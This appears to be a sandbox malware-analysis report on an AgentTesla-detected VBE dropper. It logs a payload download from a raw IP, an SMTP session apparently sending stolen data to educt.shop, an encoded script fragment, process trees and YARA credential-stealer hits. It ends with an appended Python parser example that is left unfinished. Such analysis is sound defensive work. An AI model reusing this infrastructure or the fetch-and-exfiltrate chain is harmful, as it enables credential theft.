                                    Data Ascii: 6C290A2020202057697468205368656C6C4F626A65740A20202020202020202E41707041637469766174652050726F63657373506F7765725368656C6C2E50726F6365737349640A20202020202020202E53656E644B657973202E526567526561642822484B45595F43555252454E545F555345525C536F667
                                    Jan 14, 2025 08:47:12.295655966 CET | 175 | OUT | GET /2412/dl2xgIbUbOo3ZqLShxJX.txt HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:12.488275051 CET | 1236 | IN | HTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:12 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Tue, 14 Jan 2025 02:32:27 GMT
                                    ETag: "75400-62ba15f35a05a"
                                    Accept-Ranges: bytes
                                    Content-Length: 480256
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/plain


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.7 | 49970 | 104.26.12.205 | 443 | 8124 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-14 07:48:15 UTC | 155 | OUT | GET / HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                    Host: api.ipify.org
                                    Connection: Keep-Alive
                                    2025-01-14 07:48:16 UTC | 424 | IN | HTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:48:15 GMT
                                    Content-Type: text/plain
                                    Content-Length: 12
                                    Connection: close
                                    Vary: Origin
                                    CF-Cache-Status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 901c05cfdb6f335a-EWR
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1807&rtt_var=698&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1545791&cwnd=232&unsent_bytes=0&cid=c43666db82ba9212&ts=283&x=0"
                                    2025-01-14 07:48:16 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                    Data Ascii: 8.46.123.189


                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                    Jan 14, 2025 08:48:18.935760021 CET | 587 | 49972 | 162.254.34.31 | 192.168.2.7 | 220 server1.educt.shop ESMTP Postfix
                                    Jan 14, 2025 08:48:18.936139107 CET | 49972 | 587 | 192.168.2.7 | 162.254.34.31 | EHLO 141700
                                    Jan 14, 2025 08:48:19.097470999 CET | 587 | 49972 | 162.254.34.31 | 192.168.2.7 | 250-server1.educt.shop
                                    250-PIPELINING
                                    250-SIZE 204800000
                                    250-ETRN
                                    250-STARTTLS
                                    250-AUTH PLAIN LOGIN
                                    250-AUTH=PLAIN LOGIN
                                    250-ENHANCEDSTATUSCODES
                                    250-8BITMIME
                                    250-DSN
                                    250 CHUNKING
                                    Jan 14, 2025 08:48:19.098611116 CET | 49972 | 587 | 192.168.2.7 | 162.254.34.31 | AUTH login c2VuZHhzZW5zZXNAdmV0cnlzLnNob3A=
                                    Jan 14, 2025 08:48:19.263585091 CET | 587 | 49972 | 162.254.34.31 | 192.168.2.7 | 334 UGFzc3dvcmQ6
                                    Jan 14, 2025 08:48:19.429223061 CET | 587 | 49972 | 162.254.34.31 | 192.168.2.7 | 235 2.7.0 Authentication successful
                                    Jan 14, 2025 08:48:19.429466963 CET | 49972 | 587 | 192.168.2.7 | 162.254.34.31 | MAIL FROM:<sendxsenses@vetrys.shop>
                                    Jan 14, 2025 08:48:19.590367079 CET | 587 | 49972 | 162.254.34.31 | 192.168.2.7 | 250 2.1.0 Ok
                                    Jan 14, 2025 08:48:19.592425108 CET | 49972 | 587 | 192.168.2.7 | 162.254.34.31 | RCPT TO:<senses@vetrys.shop>
                                    Jan 14, 2025 08:48:19.755903959 CET | 587 | 49972 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok
                                    Jan 14, 2025 08:48:19.756150007 CET | 49972 | 587 | 192.168.2.7 | 162.254.34.31 | DATA
                                    Jan 14, 2025 08:48:19.917481899 CET | 587 | 49972 | 162.254.34.31 | 192.168.2.7 | 354 End data with <CR><LF>.<CR><LF>
                                    Jan 14, 2025 08:48:19.918253899 CET | 49972 | 587 | 192.168.2.7 | 162.254.34.31 | .
                                    Jan 14, 2025 08:48:20.192673922 CET | 587 | 49972 | 162.254.34.31 | 192.168.2.7 | 250 2.0.0 Ok: queued as A614661091


                                    Target ID:0
                                    Start time:02:47:08
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe"
                                    Imagebase:0x7ff7e56f0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:02:47:11
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                                    Imagebase:0x7ff7e56f0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:04:11:00
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                                    Imagebase:0x7ff7e56f0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:11
                                    Start time:04:11:00
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                    Imagebase:0x7ff741d30000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:04:11:00
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:15
                                    Start time:04:11:06
                                    Start date:14/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                    Imagebase:0xbf0000
                                    File size:262'432 bytes
                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2508931005.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2508931005.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    Target ID:17
                                    Start time:04:11:07
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\wermgr.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7836" "2812" "2804" "2144" "0" "0" "1284" "0" "0" "0" "0" "0"
                                    Imagebase:0x7ff73e620000
                                    File size:229'728 bytes
                                    MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:8.6%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:86
                                      Total number of Limit Nodes:9

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q$$q$$q$$q$$q
                                      • API String ID: 0-2069967915
                                      • Opcode ID: 7393760c2294b1121b364809d0e66a0f92f5e2272c97b7ee10ac2135898c3c85
                                      • Instruction ID: e94efbb9382cb8d8824e3e608a66a227a9f57c666c327e09bbd3ebd9dc0521e9
                                      • Opcode Fuzzy Hash: 7393760c2294b1121b364809d0e66a0f92f5e2272c97b7ee10ac2135898c3c85
                                      • Instruction Fuzzy Hash: C6322D35E107198FDB54EF79D85069DF7B2FF89300F61C6A9E409AB214EB30A985CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 3
                                      • API String ID: 0-1842515611
                                      • Opcode ID: a214af1686798620d2690102aa9a14b6a7b0ed79c9a33bc6ae0bf73ff5b231a9
                                      • Instruction ID: d5556d9ef325984e710a423a426e7eb73ba86ed04dff484e24d6c557734ad5f9
                                      • Opcode Fuzzy Hash: a214af1686798620d2690102aa9a14b6a7b0ed79c9a33bc6ae0bf73ff5b231a9
                                      • Instruction Fuzzy Hash: 1D53F831C10B1A8ADB51EF68C880699F7B1FF99300F15D79AE45877221FB70AAD5CB81

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q
                                      • API String ID: 0-3126353813
                                      • Opcode ID: 1a1563c1d1b1590e534b92e73c08ce7815b41eea4777ea7fdd4799041df0c0b1
                                      • Instruction ID: 27894477414c78be72cbc9405758eeb9d80e5ce658bdf585a92b8ca4d5583f83
                                      • Opcode Fuzzy Hash: 1a1563c1d1b1590e534b92e73c08ce7815b41eea4777ea7fdd4799041df0c0b1
                                      • Instruction Fuzzy Hash: EC02AC30B002188FDB64DB79D850B6EBBA6FF84310F668569D806DB795DB31EC42CB90

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Xq$$q
                                      • API String ID: 0-855381642
                                      • Opcode ID: b1ab9be02f8a806be285a275fcf7b37e6b96310ab534b40b5bfa66a41036e6e3
                                      • Instruction ID: a0a9336b6f778926d08a6fbd521228fa2725b9d85d82b6805376e4084ec2c9d9
                                      • Opcode Fuzzy Hash: b1ab9be02f8a806be285a275fcf7b37e6b96310ab534b40b5bfa66a41036e6e3
                                      • Instruction Fuzzy Hash: C6B1AF70F042489FEB58EF79985477E7BA7ABC8300B16882DD446DB394CE399C0287D6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67cf3f3d7456d1dbd15190f94d1b486f7092e37c3c7a34cf4b3318cf97b91edc
                                      • Instruction ID: dcf40854c5fb3d0fb39db04d5157deda3bf04aec8a2bcb2761586eb0556365a2
                                      • Opcode Fuzzy Hash: 67cf3f3d7456d1dbd15190f94d1b486f7092e37c3c7a34cf4b3318cf97b91edc
                                      • Instruction Fuzzy Hash: A3332E31D107198EDB11EF68C8806ADF7B1FF99300F15C79AE558A7261EB70AAC5CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $
                                      • API String ID: 0-3993045852
                                      • Opcode ID: 72900506f036e3f04546f1abb13ba3146031ee4628e2123c4607027a9d94205a
                                      • Instruction ID: c76f2fecd09fab1020689f1482d3b70568f5a2528faa23bc6dd0b7efd16c5b73
                                      • Opcode Fuzzy Hash: 72900506f036e3f04546f1abb13ba3146031ee4628e2123c4607027a9d94205a
                                      • Instruction Fuzzy Hash: 9422F171E002188FDF64DBA9C4806AEBBF6EF85350F26846AD905EB745EB35DC41CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \VVm
                                      • API String ID: 0-390912563
                                      • Opcode ID: 7162f89d04c62a71c82e7d4c11e6eb25c8203d18af8dcf9d3392fe19e0f17597
                                      • Instruction ID: d4ed6c9fdd776e7d46f55fee78cd9a709bc454bc1760411c66c6dddcb79d4cb7
                                      • Opcode Fuzzy Hash: 7162f89d04c62a71c82e7d4c11e6eb25c8203d18af8dcf9d3392fe19e0f17597
                                      • Instruction Fuzzy Hash: 4A917E70E003499FDB64CFA9D88179EBBF2AF48304F168129E605A7394DB749C85CB85
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd6ba7ae51982df88d0809aa553b13e64ffbcb019f4a2f3eb3c5137c06326acc
                                      • Instruction ID: f1e5cdfaa3377d21c85243a29918c368cb448b3450efc89a7790eecd1c6bde9a
                                      • Opcode Fuzzy Hash: bd6ba7ae51982df88d0809aa553b13e64ffbcb019f4a2f3eb3c5137c06326acc
                                      • Instruction Fuzzy Hash: 3E924730E002048FDBA4DB68C594B6DBBF6FB85314F6684A9D809AB755DB31EC85CF81
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22483b232f73bebada5fe481812c24d0380929419593549d1ef7a31163ca2265
                                      • Instruction ID: fc9e45ee248d274bb9b6b18cebe5d0a4242bd80fe2896784f4901cc9cb90a459
                                      • Opcode Fuzzy Hash: 22483b232f73bebada5fe481812c24d0380929419593549d1ef7a31163ca2265
                                      • Instruction Fuzzy Hash: C162BF34E002089FDBA4DB68D554BADBBF6EF84710F268469D806DB795DB31EC85CB80
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f532d5dbf16953bf61f24176e4738755a4b936813231c7335c08e4c65345be1c
                                      • Instruction ID: d1baecae10a19010b7224b2000e5fffa2e498e7f2163dc3253047dbbcc493c2b
                                      • Opcode Fuzzy Hash: f532d5dbf16953bf61f24176e4738755a4b936813231c7335c08e4c65345be1c
                                      • Instruction Fuzzy Hash: 48329234F002088FDB64DF69D890BADBBB6EB88310F218629D905DB755DB31EC42CB95
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dfb6627de5e32aea74f2d484f699effcd58a1b013f9ea557e1175da3b37c5087
                                      • Instruction ID: 5537e789a8460bdc90dfb972c83b283116ba756578cb17ba959e5e5561b26907
                                      • Opcode Fuzzy Hash: dfb6627de5e32aea74f2d484f699effcd58a1b013f9ea557e1175da3b37c5087
                                      • Instruction Fuzzy Hash: 36227230E00249CFFF64DB68D4907ADB7AAEB49310F668466E819DB755CB34DC81CB91
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd724ff5d4cf689fa30da3a87a05e2bb6d9cdbb53a3f8cfc5b9a81ed5eea43b1
                                      • Instruction ID: 1022c71075a6b6bf340b6dad14449ea25abf0d8eb4eb468c2ed846c452e0fb1b
                                      • Opcode Fuzzy Hash: bd724ff5d4cf689fa30da3a87a05e2bb6d9cdbb53a3f8cfc5b9a81ed5eea43b1
                                      • Instruction Fuzzy Hash: 13B18E71E003098FDB64CFA9D88179EBBF2AF88318F158129D615E7394EB749C81CB95

Control-flow Graph

• Rendered graph; the executed/not-executed colouring and the raw edge list are not reproduced. Basic blocks 1635-1682: entry block 2df4818-2df48a4; inner loops at 2df48cf-2df48de and 2df4935-2df4944; calls to 2df0ab8 from 2df4a1f-2df4a22 and 2df4a33-2df4a36; terminal self-loop at 2df4a64.
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \VVm$\VVm
                                      • API String ID: 0-385880175
                                      • Opcode ID: 1a2a9d70eb0eae88784526068dc2d0b5f28984431bb720706a1bfdd8a72bea63
                                      • Instruction ID: f819f69d34cadb0d2778040bab8e3e3b73e8234931a6b44ab2b1deb7b4152399
                                      • Opcode Fuzzy Hash: 1a2a9d70eb0eae88784526068dc2d0b5f28984431bb720706a1bfdd8a72bea63
                                      • Instruction Fuzzy Hash: DF715E70E003499FDB64CFA9C88079EBBF2BF88714F158129D615A7354DB749842CF99

Control-flow Graph

• Rendered graph; the executed/not-executed colouring and the raw edge list are not reproduced. Basic blocks 1683-1730: entry block 2df480c-2df48a4; inner loops at 2df48cf-2df48de and 2df4935-2df4944; calls to 2df0ab8 from 2df4a1f-2df4a22 and 2df4a33-2df4a36; terminal self-loop at 2df4a64.
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \VVm$\VVm
                                      • API String ID: 0-385880175
                                      • Opcode ID: cb80f7c4cafd7dd56b96b117090254ba91957b2d0da4ee24b4d40e4c1bd9a26b
                                      • Instruction ID: 80b87a2afa2487ab7674097d85e62c22c58e4df3ad134615ef1efa10075e09aa
                                      • Opcode Fuzzy Hash: cb80f7c4cafd7dd56b96b117090254ba91957b2d0da4ee24b4d40e4c1bd9a26b
                                      • Instruction Fuzzy Hash: 5F714BB0E003498FDB64CFA9C88179EBBF2BF48314F158129DA15A7354DB749842CF99

Control-flow Graph

• Rendered graph; the executed/not-executed colouring and the raw edge list are not reproduced. Basic blocks 2425-2448: entry block 695e571-695e58b; call to 695d1c8 from 695e58d-695e5b4 and to 695d1d4 from 695e5b5-695e5d4; GlobalMemoryStatusEx called in block 695e65e-695e6cc; exit block 695e6d5-695e6fd.
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1104f414c98301e31e56dfd66a69d850ded4a0ea68311cc3f20fd8af2afc907f
                                      • Instruction ID: df1c2f798ec1d96ea6b165de425528f870cbf0693de8a99530133b9241aecfb8
                                      • Opcode Fuzzy Hash: 1104f414c98301e31e56dfd66a69d850ded4a0ea68311cc3f20fd8af2afc907f
                                      • Instruction Fuzzy Hash: 2B413372D043498FCB14DF79D8007AEBBF5AF89310F15856AD908A7681EB359846CBD1

Control-flow Graph

• Rendered graph; the executed/not-executed colouring and the raw edge list are not reproduced. Basic blocks 2451-2465: entry block 6aad4e7-6aad556; CreateWindowExW called in block 6aad5b3-6aad612; terminal self-loop at 6aad661.
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AAD602
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512517230.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6aa0000_MSBuild.jbxd
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: 0cd04ed954d972ccb1b087ba328e6637e7b6dda79ac2127d54833c8a52a23b72
                                      • Instruction ID: 7837a5481f47bda43f1813b38336e372f3c5d47403d4b49395b8efe283211da1
                                      • Opcode Fuzzy Hash: 0cd04ed954d972ccb1b087ba328e6637e7b6dda79ac2127d54833c8a52a23b72
                                      • Instruction Fuzzy Hash: 8951CFB1D103499FDB14DFAAC984ADEFFB5BF48310F64812AE819AB210D771A845CF90

Control-flow Graph

• Rendered graph; the executed/not-executed colouring and the raw edge list are not reproduced. Basic blocks 2466-2480: entry block 6aaa464-6aad556; CreateWindowExW called in block 6aad573-6aad612; terminal self-loop at 6aad661.
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AAD602
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512517230.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6aa0000_MSBuild.jbxd
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: b9ded51318056efa99311529e95b088fbc1acfb02f77db4ca11273b0c19e3781
                                      • Instruction ID: eb20393540c679ac0f774c1e16cfa733ffec92821b7ac3875adfb5f5ce0a6801
                                      • Opcode Fuzzy Hash: b9ded51318056efa99311529e95b088fbc1acfb02f77db4ca11273b0c19e3781
                                      • Instruction Fuzzy Hash: A651AEB1D103099FDB14DF9AC984ADEBFB5FF48314F64812AE819AB210D775A845CF90
                                      APIs
                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 06AAFCF1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512517230.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6aa0000_MSBuild.jbxd
                                      Similarity
                                      • API ID: CallProcWindow
                                      • String ID:
                                      • API String ID: 2714655100-0
                                      • Opcode ID: 139c5fbce6191352f3c20966f86850adc2c60a36d00a69d7d627c1f4865c3d57
                                      • Instruction ID: 2a82d4b12db4277c67c46537dea0b9383eab87bfaaefd3b58631c4915c69e004
                                      • Opcode Fuzzy Hash: 139c5fbce6191352f3c20966f86850adc2c60a36d00a69d7d627c1f4865c3d57
                                      • Instruction Fuzzy Hash: 934129B59003098FDB58DF99C448BAABBF5FF88314F24845AE519AB321D774A841CFA1
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000697), ref: 0695E6BF
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID: GlobalMemoryStatus
                                      • String ID:
                                      • API String ID: 1890195054-0
                                      • Opcode ID: 0666da8885e10a4ab5f1cbfdcebc7b97ea31a7b05e24b31b702953ee5d591708
                                      • Instruction ID: 6c8b007a34dad3990cc5fb31e8499301204b60ae42daa1482f7b8497a2be9ed1
                                      • Opcode Fuzzy Hash: 0666da8885e10a4ab5f1cbfdcebc7b97ea31a7b05e24b31b702953ee5d591708
                                      • Instruction Fuzzy Hash: 4B1112B1C0025A9BCB10DF9AC444B9EFBF4AF48320F11812AD918B7640D779A941CFA5
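The blocks above all follow one fixed layout: an optional APIs list with a ref address per call, then Memory Dump Source with the .sdmp name and its Offset, then the Similarity identifiers. What a practitioner usually wants from a text export like this is a machine-readable list of which API calls were made from which memory region of which process, with the call site expressed as an offset into that region. The following is an added example, not Joe Sandbox code, that parses that layout and cross-checks it: each ref address is converted to an offset from the region base, the PID and base encoded in the Snapshot File name are checked against the Source File name, and calls made from regions marked based on PE: false are listed separately. The sample input is excerpted from this page. Reading the first dotted field of the .sdmp name as the PID (0000000F = 15, matching hcaresult_15_...) and the fourth as the base address (matching Offset) is consistent with the page; treating the fifth field as the page protection (0x40 = PAGE_EXECUTE_READWRITE) and the seventh as the memory type (0x20000 = MEM_PRIVATE) is an assumption of this example.

```python
"""Parse the per-function metadata blocks of a Joe Sandbox text report.

Added example, not Joe Sandbox code. SAMPLE is excerpted from this report.
Only the PID (field 1) and base address (field 4) of the .sdmp name are
corroborated by the page; reading field 5 as the page protection and field 7
as the memory type is an assumption.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

PAGE_EXECUTE_READWRITE = 0x40                 # Windows PAGE_* constant
EXECUTABLE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}
MEM_PRIVATE = 0x20000                          # Windows MEM_* constant

# Excerpted from this report (three function blocks).
SAMPLE = """\
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AAD602
Memory Dump Source
• Source File: 0000000F.00000002.2512517230.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6aa0000_MSBuild.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 0cd04ed954d972ccb1b087ba328e6637e7b6dda79ac2127d54833c8a52a23b72
• Instruction ID: 7837a5481f47bda43f1813b38336e372f3c5d47403d4b49395b8efe283211da1
• Opcode Fuzzy Hash: 0cd04ed954d972ccb1b087ba328e6637e7b6dda79ac2127d54833c8a52a23b72
• Instruction Fuzzy Hash: 8951CFB1D103499FDB14DFAAC984ADEFFB5BF48310F64812AE819AB210D771A845CF90
APIs
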